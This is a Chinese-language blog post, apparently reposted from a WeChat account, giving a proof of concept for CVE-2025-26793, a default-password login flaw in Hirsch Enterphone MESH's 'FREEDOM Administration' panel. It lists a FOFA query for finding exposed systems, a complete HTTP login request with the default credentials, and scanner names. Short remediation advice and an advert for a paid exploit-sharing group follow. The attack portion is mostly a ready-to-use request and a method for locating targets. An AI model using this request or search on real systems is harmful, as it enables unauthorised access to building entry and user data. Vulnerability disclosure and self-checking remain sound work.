FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC

admin 2025年3月31日19:45:23评论44 views字数 1048阅读3分29秒阅读模式
 

00
产品简介
FREEDOM Administration 是一款面向企业级用户的综合管理平台,通常指代基于云架构的数字化,管理系统,涵盖组织权限配置、业务流程自动化、数据资产管控等核心功能,支持跨部门协同与多终端访问,该系统可能集成身份认证(如LDAP/SSO)、审计日志追踪及可视化报表分析模块,适用于中大型机构实现资源集中化管控与合规化管理。

01
漏洞概述

Hirsch(前身为Identiv和Viscount)Enterphone MESH的Web GUI配置面板将在2024年之前提供默认凭据。管理员在初始配置时不会被提示更改这些凭据,更改凭据需要许多步骤。攻击者可以通过在互联网上使用这些登录凭据获取用户信息。

02
搜索引擎
FOFA:
title="FREEDOM Administration"
FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC
03
漏洞复现
POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipContent-Length: 48formLoginName=freedom&formLoginPassword=viscount
FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC
默认用户密码freedom/viscount
FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC
04
自查工具

nuclei

FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC

afrog

FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC

xray

FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC
05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、修改默认用户密码

06
内部圈子介绍

【Nday漏洞实战圈】🛠️

专注公开1day/Nday漏洞复现 · 工具链适配支持

✧━━━━━━━━━━━━━━━━✧

🔍 资源内容

▫️ 整合全网公开Nday漏洞POC详情

▫️ 适配Xray/Afrog/Nuclei检测脚本

▫️ 支持内置与自定义POC目录混合扫描

🔄 更新计划

▫️ 每周新增7-10个实用POC(来源公开平台)

▫️ 所有脚本经过基础测试,降低调试成本

🎯 适用场景

▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 ▫️ 安全运维

✧━━━━━━━━━━━━━━━━✧

⚠️ 声明:仅限合法授权测试,严禁违规使用!

FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POC

原文始发于微信公众号(Nday Poc):FREEDOM-Administration 默认密码登录 (CVE-2025-26793)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月31日19:45:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FREEDOM-Administration 默认密码登录 (CVE-2025-26793) POChttps://cn-sec.com/archives/3902188.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息